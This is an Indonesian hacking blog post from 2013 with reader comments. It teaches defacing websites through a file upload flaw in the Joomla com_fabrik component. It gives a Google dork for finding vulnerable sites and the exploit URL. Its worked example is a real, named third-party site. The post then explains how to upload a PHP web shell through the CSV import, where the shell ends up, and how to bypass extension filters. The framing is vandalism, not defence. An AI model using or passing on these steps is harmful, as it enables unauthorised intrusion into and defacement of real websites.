• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Cara Deface dengan Metode Joomla Com_Fabrik Remote Shell Upload Vulnerability

April 6, 2013 by Jack Wilder 34 Comments

Ini sebenarnya bug lama. Namun ternyata sampai sekarang masih ada saja situs yang vuln dengan bug ini. Tentu saja dengan kesabaran dalam mencari target dan kepandaian mengolah google dork.Oke, langsung saja.

Cara Deface dengan Metode Joomla Com_Fabrik Remote Shell Upload Vulnerability

Google Dork :

inurl:index.php?option=com_fabrik

Kreasikan sendiri dork kalian.

Exploit:

index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Sebagai contoh, saya pilih http://www.duo-d-art.ch/index.php?option=com_fabrik

Ubah urlnya menjadi :

http://www.duo-d-art.ch/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Oke, kita melihat ada tempat upload disitu. Kita upload saja shell kita. Kadang bisa langsung upload php, kadang tidak bisa. Namun kali ini kebetulan bisa. :p . Tinggal browser file, lalu klik Import CSV

Dan shell kita akan terletak di www.target.com/media/shell.php

Selanjutnya bebas mau diapakan webnya haha.

Sebagai catatan saja, tidak semua web yang vuln epxloit ini bisa diupload shell backdoor. Kadang hanya support txt atau html saja. Tinggal kreasikan saja bypass ekstensi kalian misal diubah ke .phtml, .phpjpg, .phpfla, dll.

Oke sekian tutorial kali ini. Jika ada yang kurang jelas silahkan tinggalkan komentar.

Filed Under: Tutorial Deface Tagged With: Hacking

Reader Interactions

Comments

  1. febriansyah haq says

    April 6, 2013 at 11:21 pm

    Nice info sobat

    Reply
    • chiaki says

      April 7, 2013 at 7:12 am

      Y

      Reply
  2. Muro'i El-Barezy says

    April 7, 2013 at 2:12 am

    mampir lagi silaturrahim sob

    Reply
    • chiaki says

      April 7, 2013 at 7:13 am

      Terimakasih kawan. . .

      Reply
  3. Brebes VS Lamongan says

    April 7, 2013 at 2:37 am

    mampir lagi mau membawahkan kopi hahaha

    Reply
    • chiaki says

      April 7, 2013 at 6:25 pm

      Thanks

      Reply
  4. Maz Imtikhan says

    April 7, 2013 at 3:01 am

    menarik sob…

    Reply
    • chiaki says

      April 7, 2013 at 7:13 am

      Apanya ?

      Reply
  5. BlogS of Hariyanto says

    April 7, 2013 at 5:33 am

    hadir hadir belajar menyimak sobat 🙂

    Reply
    • chiaki says

      April 7, 2013 at 7:14 am

      Thanks kawan. . .

      Reply
  6. Wahyu Dwi says

    April 7, 2013 at 6:00 am

    xixixi kata katanya mantep 😀 pemalas gak akan sukses …

    Reply
    • chiaki says

      April 7, 2013 at 7:16 am

      Hehehe

      Reply
  7. Abed Saragih says

    April 7, 2013 at 6:19 am

    Tipa hari ada saja ide-ide baru ya sob tiap kali saya kesini.Luar biasa ini kreatifitasnya 🙂

    Reply
    • chiaki says

      April 7, 2013 at 7:17 am

      Terimakasih. . .

      Reply
  8. Guru Pantura says

    April 7, 2013 at 10:51 am

    Saya jujur kurang begitu mengerti masalah begini pak, masih bingung 🙁

    salam guru pantura.

    Reply
    • chiaki says

      April 8, 2013 at 1:26 am

      Thanks

      Reply
  9. cik awi says

    April 7, 2013 at 10:53 am

    Wah dahsyat ilmunya sob..

    Reply
    • chiaki says

      April 8, 2013 at 1:33 am

      Hahaha. Bisa aja sob.

      Reply
  10. Deby Putra Bahrodin says

    April 7, 2013 at 2:12 pm

    masih tetep pake injeksi ya.. Kalo di gabungin dengan virus gimana ya, mungkin aja trojan itu di gabungin sama sality terus di injeksi ke file nya …. Nyam nyam nyam

    Reply
    • chiaki says

      April 8, 2013 at 1:27 am

      Lebih suka gini. Cara klasik tp tetep banyak hasil. . . :v

      Reply
  11. budi os 19 says

    April 7, 2013 at 3:21 pm

    Salud nih sama mas adminnya….
    Selalu ada ilmu dan bahan utk di post
    #laporan hadir ya sob… 🙂

    Reply
    • chiaki says

      April 8, 2013 at 1:29 am

      Oke. Thanks. .

      Reply
  12. Rawins says

    April 7, 2013 at 4:21 pm

    ampuuun
    ga mudeng babar blas kalo yang beginian
    haha piss

    Reply
  13. cak oni says

    April 7, 2013 at 10:42 pm

    mantef kang #JOSS

    Reply
    • chiaki says

      April 8, 2013 at 1:03 pm

      aselole. :v

      Reply
  14. babol only says

    April 8, 2013 at 12:18 am

    saya g ngerti dengan yang beginian.. Haha.

    Reply
    • chiaki says

      April 13, 2013 at 1:12 am

      Hahaha. Gk lucu.

      Reply
  15. Masnady says

    April 8, 2013 at 2:13 am

    waduh.. maaf sob baru sempat mampir nih. lagi sibuk di dunia nyata.. dan nyempet2in mampir di sini. hehehehe..

    Reply
  16. PT cyberASK says

    April 25, 2013 at 10:29 am

    ditunggu komennya ama visitnya
    di
    http://cyberask.blogspot.com

    Reply
  17. Anonim says

    May 14, 2013 at 9:22 pm

    file csv tuh gimana min ?

    Reply
  18. mifta khuddin says

    May 16, 2013 at 8:37 am

    Aq kn berhasil upload shell nya. trz letaknya ada dimana y.?? koq di [site]/media/[shell.php ada .??

    Reply
  19. Anonim says

    May 20, 2013 at 3:57 am

    lagu di blognya judulnya apa y

    Reply
  20. FANDY AHMD BAYHQQI says

    June 30, 2013 at 12:00 am

    gue bego, jadi kagak tau

    Reply
  21. Anonim says

    July 9, 2013 at 1:15 pm

    gimana caranya tau kalo kita udah berhasil upload shell??

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Tutorial Deface – Menutup Halaman Depan Situs Target dengan JS Overlay

Laravel PHPUnit Remote Code Execution

Surge.sh Custom Domain or Subdomain Takeover

Tumblr Custom Domain or Subdomain Takeover

Cara Deface Website dengan Teknik Local File Inclusion

Cara Mudah Hack cPanel dengan Fitur Reset Password

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

Hack Targeted Website using Reverse IP

Azure Traffic Manager Custom Domain or Subdomain Takeover

LinuxSec / 15 queries in 0.14 seconds